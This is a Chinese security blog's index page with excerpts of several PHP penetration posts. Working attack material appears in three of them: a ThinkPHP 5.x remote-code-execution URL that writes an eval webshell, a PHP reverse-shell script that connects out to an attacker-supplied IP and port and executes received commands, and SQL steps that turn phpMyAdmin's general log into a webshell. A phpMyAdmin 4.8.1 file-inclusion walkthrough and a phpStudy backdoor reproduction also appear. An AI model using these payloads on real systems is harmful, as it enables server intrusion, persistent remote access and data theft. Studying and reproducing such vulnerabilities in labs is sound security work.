Myluzh Blog

Strive to become a dream architect.

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用

2020-3-25 myluzh PHP

0x01影响版本: ThinkPHP v5.0系列<5.0.23 ThinkPHP v5.1系列<5.1.31 0x02漏洞分析: 关键代码: // 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller')); 该漏洞形成的原因是ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,在没有开启强制路由的情况下,攻击者可以通过输入‘\’字符的方式调用任意方法,从而实现远程代码执行。 0x03入侵利用 1. 写入 Shell http//localhost/thinkphp-5.1.29/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_REQUEST[...

阅读全文>>

标签: 渗透 php 漏洞 ThinkPHP 远程命令执行

评论(0) (1153)

解决phpstudy_pro开机无法自启服务

2020-3-21 myluzh PHP

在Window的文件资源管理器地址输入StartUp文件夹地址, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp或 %programdata%\Microsoft\Windows\Start Menu\Programs\Startup 加入一个bat文件,内容如下,记得改下面phpstudy地址,这边是D:\phpstudy_pro\: %1 %2 ver|find "5.">nul&&goto :Admin mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :Admin","","runas",1)(window.close)&goto :eof :Admin D:\phpstudy_pro\Extensions\MySQL5.7.26\bin\mysqld --install D:\phpstudy_pro\Extensions\Apache2.4.39\bin\httpd.exe -k insta...

阅读全文>>

标签: phpstudy_pro windows 自启

评论(0) (692)

PHP反弹shell

2020-3-6 myluzh PHP

需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口 <?php set_time_limit(0); $ip=$_GET['ip'] $port=$_GET['port']; if ($ip == "" and $port == "") { echo "[ip] [port] not defined"; exit(); } $fp = @fsockopen($ip, $port, $errno, $errstr); if (!$fp) { echo "connection timed out"; } else { fputs($fp, "\n++++++++++connect success++++++++\n"); while (!feof($fp)) { fputs($fp, "shell:"); //输出 $shell = fgets($fp); $message = `$shell`; fputs($fp, $message); } ...

阅读全文>>

标签: php 反弹 shell

评论(0) (739)

phpMyAdmin利用日志文件get webshell

2020-3-3 myluzh PHP

条件:需要使用root登陆phpmyadmin 0x01开启日志 进入phpmyadmin后,选择变量 1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志 set global general_log='on' 2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可通过执行sql语句,修改日志保存位置  set global general_log_file='D:/phpstudy_pro/WWW/log.php' 要写日志文件路径必须要知道根路径,否则即使写入了也无法访问,也就自然无法getshell。可以通过sql语句show variables like 'datadir'查询数据库位置,一般情况可以知道根路径。爆路径的方法具体情况具体分析   0x02写入shell 执行sql查询语句,然后php一句话就会被记录到日志文件中。 SELECT"<?php @eval($_REQUEST['a']);?>" 我们可以查看日志文件,一句话已经被写入: 0x03拿shell 访问站点...

阅读全文>>

标签: 渗透 phpMyAdmin 日志 getwebshell

评论(0) (652)

phpMyAdmin4.8.1 任意文件包含漏洞分析与利用

2020-3-3 myluzh PHP

0x01影响版本 phpmyadmin 4.8.1 (需要登陆才能利用) 复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip 0x02漏洞分析 index.php 55-63行代码 if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 0x03漏洞利用 1.执行sql语句,查询当前数据库路径。 show vari...

阅读全文>>

标签: 渗透 漏洞 phpMyAdmin 4.8.1 文件包含

评论(0) (692)

phpStudy2016&2018 后门漏洞复现

2020-2-23 myluzh PHP

前言: 参考杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果提到,犯罪嫌疑人马某供述,其于2016年编写了后门,使用黑客手段非法侵入了软件官网,篡改了软件安装包内容。该“后门”无法被杀毒软件扫描删除,并且藏匿于软件某功能性代码中,极难被发现。 影响版本:     通过分析,后门代码存在phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 php_xmlrpc.dll模块中 phpStudy2016后门文件路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018后门文件路径 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 后门分析:     使用ida查看...

阅读全文>>

标签: 渗透 漏洞 phpstudy 后门 复现

评论(0) (2143)